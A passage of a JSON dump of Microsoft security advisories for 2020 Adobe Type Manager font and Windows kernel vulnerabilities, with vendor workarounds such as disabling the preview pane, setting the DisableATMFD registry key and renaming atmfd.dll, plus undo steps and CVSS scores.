atmfd.dll /save atmfd.dll.acl\n \ticacls.exe atmfd.dll /grant Administrators:(F) \n \trename atmfd.dll x-atmfd.dll\n \n\n 2. Restart the system.\n\n**Impact of workaround**\n\nApplications that rely on embedded font technology will not display properly. Renaming ATMFD.DLL could cause certain applications to stop working properly if they use OpenType fonts. Microsoft Windows does not release any OpenType fonts natively. However, third-party applications could install them and they could be affected by this change.\n\n**How to undo the workaround**\n\nFor 32-bit systems:\n\n 1. Enter the following commands at an administrative command prompt:\n \n \n \tcd \"%windir%\\system32\"\n \trename x-atmfd.dll atmfd.dll\n \ticacls.exe atmfd.dll /setowner \"NT SERVICE\\TrustedInstaller\"\n \ticacls.exe . /restore atmfd.dll.acl\n \n\n 2. Restart the system.\n\nFor 64-bit systems:\n\n 1. Enter the following commands at an administrative command prompt:\n \n \n \tcd \"%windir%\\system32\"\n \trename x-atmfd.dll atmfd.dll\n \ticacls.exe atmfd.dll /setowner \"NT SERVICE\\TrustedInstaller\"\n \ticacls.exe . /restore atmfd.dll.acl\n \tcd \"%windir%\\syswow64\"\n \trename x-atmfd.dll atmfd.dll\n \ticacls.exe atmfd.dll /setowner \"NT SERVICE\\TrustedInstaller\"\n \ticacls.exe . /restore atmfd.dll.acl\n \n\n 2. Restart the system.\n\nFor systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.\n\nVersion | Fonts Process With \n---|--- \nWindows 10 | fontdrvhost.exe in user mode appcontainer. Installed fonts are still processed in kernel mode \nWindows 10 Version 1607/Server 2016 | fontdrvhost.exe in user mode appcontainer. Installed fonts are still processed in kernel mode \nWindows 10 1703 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \nWindows 10 1709 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \nWindows 10 1803/Windows Server, version 1803 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \nWindows 10 1809/Server 2019 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \nWindows 10 1903/Windows Server, version 1903 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \nWindows 10 1909/Windows Server, version 1909 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \n \nFor more information, see [Mitigating font exploits with AppContainer](<https://www.microsoft.com/security/blog/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>).\n", "edition": 4, "modified": "2020-04-14T07:00:00", "id": "MS:CVE-2020-0938", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938", "published": "2020-04-14T07:00:00", "title": "Adobe Font Manager Library Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-07T11:48:23", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-1027"], "description": "An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n\nTo exploit the vulnerability, a locally authenticated attacker could run a specially crafted application.\n\nThe security update addresses the vulnerability by ensuring the Windows Kernel properly handles objects in memory.\n", "edition": 4, "modified": "2020-04-14T07:00:00", "id": "MS:CVE-2020-1027", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027", "published": "2020-04-14T07:00:00", "title": "Windows Kernel Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T11:48:23", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-1020"], "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.\n\nFor all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely. For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane.\n\nThe update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts.\n\nThere are several different workarounds in this section. Not all may apply to all networks.\n\nWorkaround | Applicability \n---|--- \nDisable the Preview Pane and Details Pane in Windows Explorer | Works on all systems but won't mitigate the issue if you open a document with the vulnerable font class \nDisable the WebClient service | Works on all systems but won't mitigate the issue if you open a document with the vulnerable font class \nDisableATMFD registry key using a managed deployment script | Only works on older (before Windows 10) but completely mitigates the issue though can introduce usability issues in rare cases \nDisableATMFD registry key manually | Only works on older (before Windows 10) but completely mitigates the issue though can introduce usability issues in rare cases \nRename ATMFD.DLL | Only works on older (before Windows 10) but completely mitigates the issue though can introduce usability issues in rare cases \n \n**Note:** We do not recommend that IT administrators running Windows 10 implement the workarounds described below. ATMFD.DLL is not present in Windows 10 installations starting with Windows 10, version 1709. Newer versions do not have this DLL. See the **Mitigation** section for more information.\n\n#### **Disable the Preview Pane and Details Pane in Windows Explorer**\n\nDisabling the Preview and Details panes in Windows Explorer prevents the automatic display of OTF fonts in Windows Explorer. While this prevents malicious files from being viewed in Windows Explorer, it does not prevent a local, authenticated user from running a specially crafted program to exploit this vulnerability.\n\nTo disable these panes in Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1, perform the following steps:\n\n 1. Open Windows Explorer, click **Organize**, and then click **Layout**.\n 2. Clear both the **Details pane** and **Preview pane** menu options.\n 3. Click **Organize**, and then click **Folder and search options**.\n 4. Click the **View** tab.\n 5. Under **Advanced settings**, check the **Always show icons, never thumbnails** box.\n 6. Close all open instances of Windows Explorer for the change to take effect.\n\nTo disable these panes in all supported client and server versions of Windows 10, perform the following steps:\n\n 1. Open Windows Explorer, click the **View** tab.\n 2. Clear both the **Details pane** and **Preview pane** menu options.\n 3. Click **Options**, and then click **Change folder and search options**.\n 4. Click the **View** tab.\n 5. Under **Advanced settings**, check the **Always show icons, never thumbnails** box.\n 6. Close all open instances of Windows Explorer for the change to take effect.\n\n**Impact of workaround.**\n\nWindows Explorer will not automatically display OTF fonts.\n\n**How to undo the workaround.**\n\nTo re-enable the Preview and Details panes in Windows Explorer for Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1:\n\n 1. Open Windows Explorer, click **Organize**, and then click **Layout**.\n 2. Select both the **Details pane** and **Preview pane** menu options.\n 3. Click **Organize**, and then click **Folder and search options**.\n 4. Click the **View** tab.\n 5. Under **Advanced settings**, clear the **Always show icons, never thumbnails** box.\n 6. Close all open instances of Windows Explorer for the change to take effect.\n\nTo re-enable the Preview and Details panes in Windows Explorer for all supported client and server versions of Windows 10, perform the following steps:\n\n 1. Open Windows Explorer, click the **View** tab.\n 2. Select both the **Details pane** and **Preview pane** menu options.\n 3. Click **Options**, and then click **Change folder and search options**.\n 4. Click the **View** tab.\n 5. Under **Advanced settings**, clear the **Always show icons, never thumbnails** box.\n 6. Close all open instances of Windows Explorer for the change to take effect.\n\n#### **Disable the WebClient service**\n\nDisabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround it is still possible for remote attackers who successfully exploit this vulnerability to cause the system to run programs located on the targeted user's computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet.\n\nTo disable the WebClient Service, perform the following steps:\n\n 1. Click **Start**, click **Run** (or press the **Windows Key** and **R** on the keyboard), type **Services.msc** and then click **OK**.\n 2. Right-click **WebClient** service and select **Properties**.\n 3. Change the Startup type to **Disabled**. If the service is running, click **Stop**.\n 4. Click **OK** and exit the management application.\n\n**Impact of workaround.**\n\nWhen the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the WebClient service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer.\n\n**How to undo the workaround.**\n\nTo re-enable the WebClient Service, perform the following steps:\n\n 1. Click **Start**, click **Run** (or press the **Windows Key** and **R** on the keyboard), type **Services.msc** and then click **OK**.\n 2. Right-click **WebClient** service and select **Properties**.\n 3. Change the Startup type to **Automatic**. If the service is not running, click **Start**.\n 4. Click **OK** and exit the management application.\n\n#### **DisableATMFD registry key using a managed deployment script**\n\n**Please Note:** This workaround works for Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1. ATMFD.DLL is not present in Windows 10 installations starting with Windows 10, version 1709.\n\n**Note** Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.\n\n 1. Create a text file named **ATMFD-disable.reg** that contains the following text:\n \n \n Windows Registry Editor Version 5.00\n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows]\n \"DisableATMFD\"=dword:00000001\n \n\n 2. Run regedit.exe.\n 3. In Registry Editor, click the **File** menu and then click **Import**.\n 4. Navigate to and select the** ATMFD-disable.reg** file that you created in the first step. (**Note** If your file is not listed where you expect it to be, ensure that it has not been automatically given a .txt file extension, or change the dialog\u2019s file extension parameters to **All Files**).\n 5. Click **Open** and then click **OK** to close Registry Editor.\n 6. Restart the system.\n\n**Impact of workaround**\n\nApplications that rely on embedded font technology will not display properly. Renaming ATMFD.DLL could cause certain applications to stop working properly if they use OpenType fonts. Microsoft Windows does not release any OpenType fonts natively. However, third-party applications could install them and they could be affected by this change.\n\n**How to undo the workaround.**\n\n 1. Create a text file named **ATMFD-enable.reg** that contains the following text:\n \n \n Windows Registry Editor Version 5.00\n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows]\n \"DisableATMFD\"=dword:00000000\n \n\n 2. Run regedit.exe.\n 3. In Registry Editor, click the **File** menu and then click **Import**.\n 4. Navigate to and select the **ATMFD-enable.reg** file that you created in the first step. (Note If your file is not listed where you expect it to be, ensure that it has not been automatically given a .txt file extension, or change the dialog\u2019s file extension parameters to **All Files**).\n 5. Click **Open** and then click **OK** to close Registry Editor.\n 6. Restart the system.\n\n#### **DisableATMFD registry key manually**\n\n**Please Note:** This workaround works for Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1. ATMFD.DLL is not present in Windows 10 installations starting with Windows 10, version 1709. Newer versions do not have this DLL. See the **Mitigation** section for more information.\n\n**Note** Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.\n\n 1. Run **regedit.exe** as Administrator.\n 2. In Registry Editor, navigate to the following sub key (or create it) and set its DWORD value to 1: `HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\DisableATMFD, DWORD = 1`\n 3. Close Registry Editor and restart the system.\n\n**Impact of workaround**\n\nApplications that rely on embedded font technology will not display properly. Renaming ATMFD.DLL could cause certain applications to stop working properly if they use OpenType fonts. Microsoft Windows does not release any OpenType fonts natively. However, third-party applications could install them and they could be affected by this change.\n\n**How to undo the workaround.**\n\n 1. Run **regedit.exe** as Administrator.\n 2. In Registry Editor, navigate to the following sub key and set its DWORD value to 0: `HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\DisableATMFD, DWORD = 0`\n 3. Close Registry Editor and restart the system.\n\n#### **Rename ATMFD.DLL**\n\n**Please Note:** This workaround works for Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1. ATMFD.DLL is not present in Windows 10 installations starting with Windows 10, version 1709. Newer versions do not have this DLL. See the **Mitigation** section for more information.\n\nFor 32-bit systems:\n\n 1. Enter the following commands at an administrative command prompt:\n \n \n cd \"%windir%\\system32\"\n takeown.exe /f atmfd.dll\n icacls.exe atmfd.dll /save atmfd.dll.acl\n icacls.exe atmfd.dll /grant Administrators:(F) \n rename atmfd.dll x-atmfd.dll\n \n\n 2. Restart the system.\n\nFor 64-bit systems:\n\n 1. Enter the following commands at an administrative command prompt:\n \n \n \tcd \"%windir%\\system32\"\n \ttakeown.exe /f atmfd.dll\n \ticacls.exe atmfd.dll /save atmfd.dll.acl\n \ticacls.exe atmfd.dll /grant Administrators:(F) \n \trename atmfd.dll x-atmfd.dll\n \tcd \"%windir%\\syswow64\"\n \ttakeown.exe /f atmfd.dll\n \ticacls.exe atmfd.dll /save atmfd.dll.acl\n \ticacls.exe atmfd.dll /grant Administrators:(F) \n \trename atmfd.dll x-atmfd.dll\n \n\n 2. Restart the system.\n\n**Impact of workaround**\n\nApplications that rely on embedded font technology will not display properly. Renaming ATMFD.DLL could cause certain applications to stop working properly if they use OpenType fonts. Microsoft Windows does not release any OpenType fonts natively. However, third-party applications could install them and they could be affected by this change.\n\n**How to undo the workaround**\n\nFor 32-bit systems:\n\n 1. Enter the following commands at an administrative command prompt:\n \n \n \tcd \"%windir%\\system32\"\n \trename x-atmfd.dll atmfd.dll\n \ticacls.exe atmfd.dll /setowner \"NT SERVICE\\TrustedInstaller\"\n \ticacls.exe . /restore atmfd.dll.acl\n \n\n 2. Restart the system.\n\nFor 64-bit systems:\n\n 1. Enter the following commands at an administrative command prompt:\n \n \n \tcd \"%windir%\\system32\"\n \trename x-atmfd.dll atmfd.dll\n \ticacls.exe atmfd.dll /setowner \"NT SERVICE\\TrustedInstaller\"\n \ticacls.exe . /restore atmfd.dll.acl\n \tcd \"%windir%\\syswow64\"\n \trename x-atmfd.dll atmfd.dll\n \ticacls.exe atmfd.dll /setowner \"NT SERVICE\\TrustedInstaller\"\n \ticacls.exe . /restore atmfd.dll.acl\n \n\n 2. Restart the system.\n\nFor systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.\n\nVersion | Fonts Process With \n---|--- \nWindows 10 | fontdrvhost.exe in user mode appcontainer. Installed fonts are still processed in kernel mode \nWindows 10 Version 1607/Server 2016 | fontdrvhost.exe in user mode appcontainer. Installed fonts are still processed in kernel mode \nWindows 10 1703 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \nWindows 10 1709 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \nWindows 10 1803/Windows Server, version 1803 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \nWindows 10 1809/Server 2019 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \nWindows 10 1903/Windows Server, version 1903 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \nWindows 10 1909/Windows Server, version 1909 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \n \nFor more information, see [Mitigating font exploits with AppContainer](<https://www.microsoft.com/security/blog/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>).\n", "edition": 4, "modified": "2020-04-14T07:00:00", "id": "MS:CVE-2020-1020", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020", "published": "2020-04-14T07:00:00", "title": "Adobe Font Manager Library Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-07T11:48:20", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-1020"], "description": "Microsoft has become aware of limited targeted Windows 7 based attacks that could leverage un-patched vulnerabilities in the Adobe Type Manager Library, and is providing the following guidance to help reduce customer risk until the security update is released. We appreciate the efforts of our industry partners and are complying with a 7-day timeline for disclosing information regarding these limited attacks.\n\nTwo remote code execution vulnerabilities exist in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane.\n\nMicrosoft is aware of this vulnerability and working on a fix. Updates that address security vulnerabilities in Microsoft software are typically released on Update Tuesday, the second Tuesday of each month. This predictable schedule allows for partner quality assurance and IT planning, which helps maintain the Windows ecosystem as a reliable, secure choice for our customers. The operating system versions that are affected by this vulnerability are listed below. Please see the mitigation and workarounds for guidance on how to reduce the risk.\n\n**Please Note:** The threat is low for those systems running Windows 10 due to mitigations that were put in place with the first version released in 2015.\n\nPlease see the mitigation section for details. Microsoft is not aware of any attacks against the Windows 10 platform. The possibility of remote code execution is negligible and elevation of privilege is not possible. We do not recommend that IT administrators running Windows 10 implement the workarounds described below.\n\nMicrosoft recommends upgrading to the Windows 10 family of clients and servers.\n\nThere are several different workarounds in this section. Not all may apply to all networks.\n\nWorkaround | Applicability \n---|--- \nDisable the Preview Pane and Details Pane in Windows Explorer | Works on all systems but won't mitigate the issue if you open a document with the vulnerable font class \nDisable the WebClient service | Works on all systems but won't mitigate the issue if you open a document with the vulnerable font class \nDisableATMFD registry key using a managed deployment script | Only works on older (before Windows 10) but completely mitigates the issue though can introduce usability issues in rare cases \nDisableATMFD registry key manually | Only works on older (before Windows 10) but completely mitigates the issue though can introduce usability issues in rare cases \nRename ATMFD.DLL | Only works on older (before Windows 10) but completely mitigates the issue though can introduce usability issues in rare cases \n \n**Note:** We do not recommend that IT administrators running Windows 10 implement the workarounds described below. ATMFD.DLL is not present in Windows 10 installations starting with Windows 10, version 1709. Newer versions do not have this DLL. See the **Mitigation** section for more information.\n\n#### **Disable the Preview Pane and Details Pane in Windows Explorer**\n\nDisabling the Preview and Details panes in Windows Explorer prevents the automatic display of OTF fonts in Windows Explorer. While this prevents malicious files from being viewed in Windows Explorer, it does not prevent a local, authenticated user from running a specially crafted program to exploit this vulnerability.\n\nTo disable these panes in Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1, perform the following steps:\n\n 1. Open Windows Explorer, click **Organize**, and then click **Layout**.\n 2. Clear both the **Details pane** and **Preview pane** menu options.\n 3. Click **Organize**, and then click **Folder and search options**.\n 4. Click the **View** tab.\n 5. Under **Advanced settings**, check the **Always show icons, never thumbnails** box.\n 6. Close all open instances of Windows Explorer for the change to take effect.\n\nTo disable these panes in all supported client and server versions of Windows 10, perform the following steps:\n\n 1. Open Windows Explorer, click the **View** tab.\n 2. Clear both the **Details pane** and **Preview pane** menu options.\n 3. Click **Options**, and then click **Change folder and search options**.\n 4. Click the **View** tab.\n 5. Under **Advanced settings**, check the **Always show icons, never thumbnails** box.\n 6. Close all open instances of Windows Explorer for the change to take effect.\n\n**Impact of workaround.**\n\nWindows Explorer will not automatically display OTF fonts.\n\n**How to undo the workaround.**\n\nTo re-enable the Preview and Details panes in Windows Explorer for Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1:\n\n 1. Open Windows Explorer, click **Organize**, and then click **Layout**.\n 2. Select both the **Details pane** and **Preview pane** menu options.\n 3. Click **Organize**, and then click **Folder and search options**.\n 4. Click the **View** tab.\n 5. Under **Advanced settings**, clear the **Always show icons, never thumbnails** box.\n 6. Close all open instances of Windows Explorer for the change to take effect.\n\nTo re-enable the Preview and Details panes in Windows Explorer for all supported client and server versions of Windows 10, perform the following steps:\n\n 1. Open Windows Explorer, click the **View** tab.\n 2. Select both the **Details pane** and **Preview pane** menu options.\n 3. Click **Options**, and then click **Change folder and search options**.\n 4. Click the **View** tab.\n 5. Under **Advanced settings**, clear the **Always show icons, never thumbnails** box.\n 6. Close all open instances of Windows Explorer for the change to take effect.\n\n#### **Disable the WebClient service**\n\nDisabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround it is still possible for remote attackers who successfully exploit this vulnerability to cause the system to run programs located on the targeted user's computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet.\n\nTo disable the WebClient Service, perform the following steps:\n\n 1. Click **Start**, click **Run** (or press the **Windows Key** and **R** on the keyboard), type **Services.msc** and then click **OK**.\n 2. Right-click **WebClient** service and select **Properties**.\n 3. Change the Startup type to **Disabled**. If the service is running, click **Stop**.\n 4. Click **OK** and exit the management application.\n\n**Impact of workaround.**\n\nWhen the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the WebClient service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer.\n\n**How to undo the workaround.**\n\nTo re-enable the WebClient Service, perform the following steps:\n\n 1. Click **Start**, click **Run** (or press the **Windows Key** and **R** on the keyboard), type **Services.msc** and then click **OK**.\n 2. Right-click **WebClient** service and select **Properties**.\n 3. Change the Startup type to **Automatic**. If the service is not running, click **Start**.\n 4. Click **OK** and exit the management application.\n\n#### **DisableATMFD registry key using a managed deployment script**\n\n**Please Note:** This workaround works for Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1. ATMFD.DLL is not present in Windows 10 installations starting with Windows 10, version 1709.\n\n**Note** Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.\n\n 1. Create a text file named **ATMFD-disable.reg** that contains the following text:\n \n \n Windows Registry Editor Version 5.00\n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows]\n \"DisableATMFD\"=dword:00000001\n \n\n 2. Run regedit.exe.\n 3. In Registry Editor, click the **File** menu and then click **Import**.\n 4. Navigate to and select the** ATMFD-disable.reg** file that you created in the first step. (**Note** If your file is not listed where you expect it to be, ensure that it has not been automatically given a .txt file extension, or change the dialog\u2019s file extension parameters to **All Files**).\n 5. Click **Open** and then click **OK** to close Registry Editor.\n 6. Restart the system.\n\n**Impact of workaround**\n\nApplications that rely on embedded font technology will not display properly. Renaming ATMFD.DLL could cause certain applications to stop working properly if they use OpenType fonts. Microsoft Windows does not release any OpenType fonts natively. However, third-party applications could install them and they could be affected by this change.\n\n**How to undo the workaround.**\n\n 1. Create a text file named **ATMFD-enable.reg** that contains the following text:\n \n \n Windows Registry Editor Version 5.00\n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows]\n \"DisableATMFD\"=dword:00000000\n \n\n 2. Run regedit.exe.\n 3. In Registry Editor, click the **File** menu and then click **Import**.\n 4. Navigate to and select the **ATMFD-enable.reg** file that you created in the first step. (Note If your file is not listed where you expect it to be, ensure that it has not been automatically given a .txt file extension, or change the dialog\u2019s file extension parameters to **All Files**).\n 5. Click **Open** and then click **OK** to close Registry Editor.\n 6. Restart the system.\n\n#### **DisableATMFD registry key manually**\n\n**Please Note:** This workaround works for Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1. ATMFD.DLL is not present in Windows 10 installations starting with Windows 10, version 1709. Newer versions do not have this DLL. See the **Mitigation** section for more information.\n\n**Note** Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.\n\n 1. Run **regedit.exe** as Administrator.\n 2. In Registry Editor, navigate to the following sub key (or create it) and set its DWORD value to 1: `HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\DisableATMFD, DWORD = 1`\n 3. Close Registry Editor and restart the system.\n\n**Impact of workaround**\n\nApplications that rely on embedded font technology will not display properly. Renaming ATMFD.DLL could cause certain applications to stop working properly if they use OpenType fonts. Microsoft Windows does not release any OpenType fonts natively. However, third-party applications could install them and they could be affected by this change.\n\n**How to undo the workaround.**\n\n 1. Run **regedit.exe** as Administrator.\n 2. In Registry Editor, navigate to the following sub key and set its DWORD value to 0: `HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\DisableATMFD, DWORD = 0`\n 3. Close Registry Editor and restart the system.\n\n#### **Rename ATMFD.DLL**\n\n**Please Note:** This workaround works for Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1. ATMFD.DLL is not present in Windows 10 installations starting with Windows 10, version 1709. Newer versions do not have this DLL. See the **Mitigation** section for more information.\n\nFor 32-bit systems:\n\n 1. Enter the following commands at an administrative command prompt:\n \n \n cd \"%windir%\\system32\"\n takeown.exe /f atmfd.dll\n icacls.exe atmfd.dll /save atmfd.dll.acl\n icacls.exe atmfd.dll /grant Administrators:(F) \n rename atmfd.dll x-atmfd.dll\n \n\n 2. Restart the system.\n\nFor 64-bit systems:\n\n 1. Enter the following commands at an administrative command prompt:\n \n \n \tcd \"%windir%\\system32\"\n \ttakeown.exe /f atmfd.dll\n \ticacls.exe atmfd.dll /save atmfd.dll.acl\n \ticacls.exe atmfd.dll /grant Administrators:(F) \n \trename atmfd.dll x-atmfd.dll\n \tcd \"%windir%\\syswow64\"\n \ttakeown.exe /f atmfd.dll\n \ticacls.exe atmfd.dll /save atmfd.dll.acl\n \ticacls.exe atmfd.dll /grant Administrators:(F) \n \trename atmfd.dll x-atmfd.dll\n \n\n 2. Restart the system.\n\n**Impact of workaround**\n\nApplications that rely on embedded font technology will not display properly. Renaming ATMFD.DLL could cause certain applications to stop working properly if they use OpenType fonts. Microsoft Windows does not release any OpenType fonts natively. However, third-party applications could install them and they could be affected by this change.\n\n**How to undo the workaround**\n\nFor 32-bit systems:\n\n 1. Enter the following commands at an administrative command prompt:\n \n \n \tcd \"%windir%\\system32\"\n \trename x-atmfd.dll atmfd.dll\n \ticacls.exe atmfd.dll /setowner \"NT SERVICE\\TrustedInstaller\"\n \ticacls.exe . /restore atmfd.dll.acl\n \n\n 2. Restart the system.\n\nFor 64-bit systems:\n\n 1. Enter the following commands at an administrative command prompt:\n \n \n \tcd \"%windir%\\system32\"\n \trename x-atmfd.dll atmfd.dll\n \ticacls.exe atmfd.dll /setowner \"NT SERVICE\\TrustedInstaller\"\n \ticacls.exe . /restore atmfd.dll.acl\n \tcd \"%windir%\\syswow64\"\n \trename x-atmfd.dll atmfd.dll\n \ticacls.exe atmfd.dll /setowner \"NT SERVICE\\TrustedInstaller\"\n \ticacls.exe . /restore atmfd.dll.acl\n \n\n 2. Restart the system.\n\nFor systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.\n\nVersion | Fonts Process With \n---|--- \nWindows 10 | fontdrvhost.exe in user mode appcontainer. Installed fonts are still processed in kernel mode \nWindows 10 Version 1607/Server 2016 | fontdrvhost.exe in user mode appcontainer. Installed fonts are still processed in kernel mode \nWindows 10 1703 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \nWindows 10 1709 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \nWindows 10 1803/Windows Server, version 1803 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \nWindows 10 1809/Server 2019 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \nWindows 10 1903/Windows Server, version 1903 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \nWindows 10 1909/Windows Server, version 1909 | All fonts are processed in fontdrvhost.exe in user mode appcontainer. \n \nFor more information, see [Mitigating font exploits with AppContainer](<https://www.microsoft.com/security/blog/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>).\n", "edition": 4, "modified": "2020-04-14T07:00:00", "id": "MS:ADV200006", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006", "published": "2020-04-14T07:00:00", "title": "Type 1 Font Parsing Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-22T21:32:36", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-6408", "CVE-2021-21108", "CVE-2021-21114", "CVE-2020-16024", "CVE-2020-6409", "CVE-2020-16043", "CVE-2020-6548", "CVE-2020-6518", "CVE-2020-6464", "CVE-2020-16026", "CVE-2020-15965", "CVE-2020-16012", "CVE-2020-16000", "CVE-2020-6395", "CVE-2020-6569", "CVE-2020-6445", "CVE-2020-6454", "CVE-2020-6381", "CVE-2020-16011", "CVE-2020-15979", "CVE-2020-6428", "CVE-2020-6564", "CVE-2020-6424", "CVE-2020-6446", "CVE-2020-6458", "CVE-2020-6394", "CVE-2020-6397", "CVE-2020-15962", "CVE-2020-6506", "CVE-2020-6468", "CVE-2020-6831", "CVE-2020-15969", "CVE-2020-16007", "CVE-2020-6570", "CVE-2020-6533", "CVE-2020-6434", "CVE-2020-16032", "CVE-2020-6561", "CVE-2020-6432", "CVE-2020-6540", "CVE-2020-6559", "CVE-2020-6447", "CVE-2020-6545", "CVE-2020-6554", "CVE-2020-6566", "CVE-2020-1341", "CVE-2020-6399", "CVE-2020-6452", "CVE-2020-6483", 